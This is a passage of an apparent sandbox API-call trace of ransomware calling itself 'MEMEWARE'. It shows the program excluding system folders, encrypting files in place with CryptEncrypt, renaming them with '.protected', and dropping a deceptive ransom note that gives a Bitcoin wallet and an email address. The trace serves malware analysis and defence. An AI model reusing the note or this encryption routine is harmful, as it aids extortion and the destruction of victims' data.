lpOverlapped=0x0) returned 1 [0073.271] CloseHandle (hObject=0xd4) returned 1 [0073.272] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0073.272] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0073.273] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RESTORE_FILES.txt") returned 100 [0073.273] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.273] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.273] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0073.274] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.274] WriteFile (in: hFile=0xb4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0073.274] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.274] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0073.274] CloseHandle (hObject=0xb4) returned 1 [0073.274] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0073.274] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0073.275] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RESTORE_FILES.txt") returned 91 [0073.275] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0073.275] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.275] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0073.276] lstrlenA (lpString="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") returned 684 [0073.276] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0073.276] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.276] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0073.276] CloseHandle (hObject=0xa4) returned 1 [0073.277] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0073.277] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Windows") returned -1 [0073.277] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Program Files") returned -1 [0073.277] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Program Files (x86)") returned -1 [0073.277] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="$Recycle.bin") returned 1 [0073.277] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="System Volume Information") returned -1 [0073.277] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 82 [0073.277] lstrcmpW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2=".") returned 1 [0073.277] lstrcmpW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="..") returned 1 [0073.277] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*") returned 84 [0073.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0073.277] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.277] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.277] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.277] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.277] lstrcmpiW (lpString1=".", 
lpString2="System Volume Information") returned -1 [0073.277] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\.") returned 84 [0073.277] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.277] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.278] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.278] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.278] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.278] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.278] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.278] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\..") returned 85 [0073.278] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.278] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.278] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.278] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0073.278] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0073.278] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0073.278] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0073.278] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0073.278] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned 91 [0073.278] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0073.278] lstrcmpW 
(lpString1="packages", lpString2="..") returned 1 [0073.278] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*") returned 93 [0073.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0073.279] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.279] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.279] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.279] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.279] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.279] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\.") returned 93 [0073.279] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.279] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.279] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.279] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.279] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.279] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.279] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.279] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\..") returned 94 [0073.279] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.279] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0073.279] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.279] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Windows") returned -1 [0073.279] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files") returned 1 [0073.279] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files (x86)") returned 1 [0073.279] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="$Recycle.bin") returned 1 [0073.279] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="System Volume Information") returned 1 [0073.279] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned 112 [0073.279] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0073.279] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0073.280] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*") returned 114 [0073.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0073.280] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.280] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.280] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.280] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.280] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.280] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\.") returned 114 [0073.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.280] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.280] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.280] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.280] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.280] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.280] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.280] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\..") returned 115 [0073.280] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.280] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.280] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.280] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0073.280] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0073.280] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0073.280] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0073.280] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0073.280] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0073.280] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0073.280] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0073.280] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0073.280] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0073.280] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.281] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0073.281] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0073.281] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0073.281] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0073.281] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0073.281] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0073.281] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.326] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.326] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, 
lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.329] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.329] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0073.456] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0073.516] CloseHandle (hObject=0xd8) returned 1 [0073.519] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 131 [0073.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.protected")) returned 1 [0073.520] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.520] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Windows") returned -1 [0073.521] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files") returned 
1 [0073.521] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files (x86)") returned 1 [0073.521] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="$Recycle.bin") returned 1 [0073.521] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="System Volume Information") returned 1 [0073.521] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0073.521] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".protected") returned 0x0 [0073.521] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0073.521] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0073.521] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0073.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.531] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0073.531] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".txt") returned 0x0 [0073.531] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package 
Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0073.531] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".rar") returned 0x0 [0073.531] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0073.531] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".zip") returned 0x0 [0073.531] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.551] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.551] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.551] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.551] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0073.552] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0073.552] CloseHandle (hObject=0xd8) returned 1 [0073.552] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
